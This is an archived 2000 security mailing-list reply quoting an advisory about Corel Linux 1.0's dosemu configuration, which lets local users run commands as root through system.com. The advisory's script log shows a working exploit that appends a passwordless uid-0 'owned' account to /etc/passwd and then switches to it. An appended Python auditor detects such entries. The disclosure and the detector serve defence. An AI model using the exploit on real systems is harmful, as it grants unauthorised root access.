I tested this on Debian's dosemu, Version: 0.98.8-2 (Debian woody), and did not get these results. It seems the Debian maintainer (Herbert Xu) Did The Right Thing in the config file. :)

* suidat_private <suidat_private> [000303 10:28]:
> Re all,
>
> Hadn't seen this one around yet, has been on my site for about a week now.
>
> Corel's mailserver bounced me about this IIRC? What's up Corel?
>
> Cheers.
>
> ----------------------------
>
> suidat_private - Corel Linux dosemu config error. Local root compromise.
>
> Software: Corel Linux 1.0 dosemu distribution configuration
> URL: http://linux.corel.com
> Version: Version 1.0
> Platforms: Corel Linux only.
> Type: Default misconfiguration. No one reads README anymore??
>
> Summary:
>
> Local users can take advantage of a packaging and configuration
> error (which has been known and documented for a long time) to
> execute arbitrary commands as root.
>
> We see from the doc/README/SECURITY file as well as
> http://www.dosemu.org/docs/README/0.98/README-3.html
> written in 1997 that this configuration is bad.
>
> Vulnerability:
>
> The system.com command is available to any user who runs the
> dos emulator. This is a direct violation of the advice from
> the SECURITY readme file:
>
>     Never allow the 'system.com' command (part of dosemu)
>     to be executed. It makes dosemu execute the libc
>     'system()' function. Though privileges are turned off,
>     the process inherits the switched uid-setting
>     (uid=root, euid=user), hence the unix process can use
>     setreuid to gain root access back. ... the rest you
>     can imagine yourself.
>
> Exploit:
>
> This is a script log which details how to reproduce this:
>
>
> Script started on Fri Feb 25 13:54:00 2000
> nebula:~$ id
> uid=1000(suid) gid=1000(suid) groups=1000(suid)
> nebula:~$ cat > hack-corel
> #!/bin/bash
> echo "owned::0:0::/:/bin/bash" >> /etc/passwd
> ^D
> nebula:~$ chmod a+rx hack-corel
> nebula:~$ export PATH="$PATH:."
> nebula:~$ dos
> CPU speed set to 430/1 MHz
> Running on CPU=586, FPU=1, rdtsc=1
>
> [ snip bunch of dosemu crap ]
>
> "Welcome to dosemu 0.98!
> C:\> system hack-corel;
> sh: : command not found
> C:\> exitERROR: general protection at 0x3f0ff: 0
> ERROR: SIGSEGV, protected insn...exiting!
>
> nebula:~$ tail -1 /etc/passwd
> owned::0:0::/:/bin/bash
> nebula:~$ su owned
> nebula:/home/suid# id
> uid=0(root) gid=0(root) groups=0(root)
> nebula:/home/suid# exit
> exit
> nebula:~$ exit
>
> Script done on Fri Feb 25 13:55:27 2000
>
> Note:
> This is not a vulnerability in dosemu itself. The documentation
> warns users very specifically that this will happen if the system
> is configured as such.
>
> Greets:
>
> duke
> cr
> active

-- 
Seth Arnold | http://www.willamette.edu/~sarnold/
Hate spam? See http://maps.vix.com/rbl/ for help
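The outcome of the script log above is a hand-appended /etc/passwd line with an empty password field and uid 0. The following audit of passwd(5) records is an added example for detecting that outcome, not code from the original post or from dosemu; the sample file contents are constructed.

```python
import sys
from typing import List, Tuple

# Constructed sample of /etc/passwd contents: a normal root entry, two
# ordinary accounts, and the kind of line the script log above appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
suid:x:1000:1000:suid:/home/suid:/bin/bash
owned::0:0::/:/bin/bash
"""

Finding = Tuple[int, str, str]  # (line number, account name, reason)


def audit_passwd(text: str) -> List[Finding]:
    """Flag passwd(5) entries that hand out root without a credential.

    Per record: the line must have the seven colon-separated fields
    passwd(5) requires, a uid of 0 may belong only to 'root', and the
    password field must not be empty (an empty field means no password
    is asked for; 'x' means the hash lives in /etc/shadow).
    """
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0],
                             "malformed record: %d fields" % len(fields)))
            continue
        name, password, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((lineno, name, "non-numeric uid %r" % uid))
        elif int(uid) == 0 and name != "root":
            findings.append((lineno, name, "uid 0 account other than root"))
        if password == "":
            findings.append((lineno, name, "empty password field"))
    return findings


def main(argv: List[str]) -> None:
    # Audit the file named on the command line, or the constructed sample.
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_PASSWD
    for lineno, name, reason in audit_passwd(text):
        print("line %d (%s): %s" % (lineno, name, reason))


if __name__ == "__main__":
    main(sys.argv)
```

Run with `/etc/passwd` as the argument to audit the real file; a clean system produces no output.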
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:58 PDT